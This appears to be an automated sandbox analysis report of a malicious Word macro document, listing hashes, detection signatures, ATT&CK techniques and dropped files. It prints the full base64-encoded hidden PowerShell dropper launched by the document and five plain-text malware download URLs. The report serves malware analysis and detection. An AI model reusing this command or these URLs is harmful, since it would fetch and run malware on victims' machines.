Analysis

  • max time kernel
    137s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 23:21

General

  • Target

    68fb79964f8c30cb9f75738bb6ab96df_JaffaCakes118.doc

  • Size

    175KB

  • MD5

    68fb79964f8c30cb9f75738bb6ab96df

  • SHA1

    ecb9e28f02cd7f5a7d026fcd14e312b9c7534303

  • SHA256

    8d56a8ad6afa592ed46d6a295b2246ed8b80ee67007799c62b7280a0e953f2c3

  • SHA512

    ad8dc182ade31b32e47584bd34a56ce17eb714b8a31370b6aa5caa3e0ca1d95d90e2506b3f89eaf6e917befc8336177c142e272da139642d834373b72962131f

  • SSDEEP

    3072:Lu2y/GdybktGDWLS0HZWD5w8K7Nk98D7IBUB/F4aqA9O:Lu2k4btGiL3HJk98D7bBdZqA0

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://bashirahindonesia.com/wp-admin/LBPLS7/

exe.dropper

http://nn.5ctelematics.com/temp/qck7s/

exe.dropper

http://karnatakatoursandtravels.com/cli/wBeE3l1Fs/

exe.dropper

https://soaponline.org/cgi-bin/wyi/

exe.dropper

https://eldodesign.com/eldo/89t8u/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\68fb79964f8c30cb9f75738bb6ab96df_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3888
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABFAHkAdABhAHQAZgBjAGwAdAA9ACcATgBsAGwAYgBnAHAAbgBzACcAOwAkAEkAagB1AHMAZwB3AG0AdgBvAGUAZAByACAAPQAgACcAOAAzADIAJwA7ACQAWABuAHoAagBoAHQAbABzAGQAPQAnAFgAYQBqAHkAegB0AGQAcgB4AHEAcwBvAHMAJwA7ACQAUABhAHcAZwB1AHoAZgBmAGgAcwBhAG0APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkAagB1AHMAZwB3AG0AdgBvAGUAZAByACsAJwAuAGUAeABlACcAOwAkAFQAaABvAHAAeQBnAGoAeQA9ACcAQgBqAHkAaQB6AGIAeQBhAHAAJwA7ACQAQQBjAHEAdABuAGMAZQBuAHUAZABzAHEAPQAuACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBFAEIAQwBsAGkARQBOAHQAOwAkAFEAYQBnAGEAegByAGwAcQBpAHkAbQBxAD0AJwBoAHQAdABwADoALwAvAGIAYQBzAGgAaQByAGEAaABpAG4AZABvAG4AZQBzAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ATABCAFAATABTADcALwAqAGgAdAB0AHAAOgAvAC8AbgBuAC4ANQBjAHQAZQBsAGUAbQBhAHQAaQBjAHMALgBjAG8AbQAvAHQAZQBtAHAALwBxAGMAawA3AHMALwAqAGgAdAB0AHAAOgAvAC8AawBhAHIAbgBhAHQAYQBrAGEAdABvAHUAcgBzAGEAbgBkAHQAcgBhAHYAZQBsAHMALgBjAG8AbQAvAGMAbABpAC8AdwBCAGUARQAzAGwAMQBGAHMALwAqAGgAdAB0AHAAcwA6AC8ALwBzAG8AYQBwAG8AbgBsAGkAbgBlAC4AbwByAGcALwBjAGcAaQAtAGIAaQBuAC8AdwB5AGkALwAqAGgAdAB0AHAAcwA6AC8ALwBlAGwAZABvAGQAZQBzAGkAZwBuAC4AYwBvAG0ALwBlAGwAZABvAC8AOAA5AHQAOAB1AC8AJwAuACIAUwBwAGAAbABpAFQAIgAoACcAKgAnACkAOwAkAFMAaQBxAHUAcABlAGEAcQBmAHoAPQAnAEcAegBlAGQAbgBlAHIAbwBjAGkAcwB5AGoAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoAcABhAGIAbwBoAHAAcwBnAGYAIABpAG4AIAAkAFEAYQBnAGEAegByAGwAcQBpAHkAbQBxACkAewB0AHIAeQB7ACQAQQBjAHEAdABuAGMAZQBuAHUAZABzAHEALgAiAEQATwB3AGAATgBsAE8AQQBEAGYAaQBgAGwARQAiACgAJABaAHAAYQBiAG8AaABwAHMAZwBmACwAIAAkAFAAYQB3AGcAdQB6AGYAZgBoAHMAYQBtACkAOwAkAFkAbwB0AG8AYwB5AHEAYgB5AHkAPQAnAEIAaQBpAHUAaAB0AGwAcwBpAHUAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABQAGEAdwBnAHUAegBmAGYAaABzAGEAbQApAC4AIgBMAGAARQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA4ADEAMgA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAFAAYQB3AGcAdQB6AGYAZgBoAHMAYQBtACkAOwAkAFkAeQBoAGoAcQBzAGwAawB2AGMAYgBsAD0AJwBaAHAAeQBnAGYAcwB2AHAAZwAnADsAYgByAGUAYQBrADsAJABMAGUAeABsAGEAZAByAGkAcwBlAGEAPQAnAEgAZgBqAHkAZwBmAGgAaQB3AG8AbQBkACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAcwBhAGkAcgBuAHcAZgBuAG4AeQA9ACcASgBkAHMAYQB5AGcAZwB5AHoAaQB3AGoAYgAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4376

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A485005.wmf
      Filesize

      444B

      MD5

      7b2eb21a6669cd9a1d52703d139203f7

      SHA1

      b33cb2c3e674fd6559d5da3fc8c2ef9ab9d032ff

      SHA256

      515559707d87cc60a107c82f80081b046ffe242c7f005d78a06cf1a6dda5da6b

      SHA512

      eda5eccc5e32b2328f8872bf1ae1628e45fcc8d12896112547e0a0d6453eeabdf8e9ff591c0e761da453be9e1a715bb9d06738edc494d62d4783ae5292d54b32

    • C:\Users\Admin\AppData\Local\Temp\TCD97ED.tmp\iso690.xsl
      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tpl5eerc.1uf.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1092-8-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-5-0x00007FFF9AC0D000-0x00007FFF9AC0E000-memory.dmp
      Filesize

      4KB

    • memory/1092-18-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-6-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-7-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-0-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
      Filesize

      64KB

    • memory/1092-12-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-11-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-13-0x00007FFF587D0000-0x00007FFF587E0000-memory.dmp
      Filesize

      64KB

    • memory/1092-10-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-9-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-16-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-15-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-14-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-580-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-4-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
      Filesize

      64KB

    • memory/1092-19-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-21-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-22-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-20-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-3-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
      Filesize

      64KB

    • memory/1092-1-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
      Filesize

      64KB

    • memory/1092-17-0x00007FFF587D0000-0x00007FFF587E0000-memory.dmp
      Filesize

      64KB

    • memory/1092-2-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
      Filesize

      64KB

    • memory/1092-551-0x00007FFF9AB70000-0x00007FFF9AD65000-memory.dmp
      Filesize

      2.0MB

    • memory/1092-576-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
      Filesize

      64KB

    • memory/1092-577-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
      Filesize

      64KB

    • memory/1092-578-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
      Filesize

      64KB

    • memory/1092-579-0x00007FFF5ABF0000-0x00007FFF5AC00000-memory.dmp
      Filesize

      64KB

    • memory/4376-58-0x000001E3C4950000-0x000001E3C4972000-memory.dmp
      Filesize

      136KB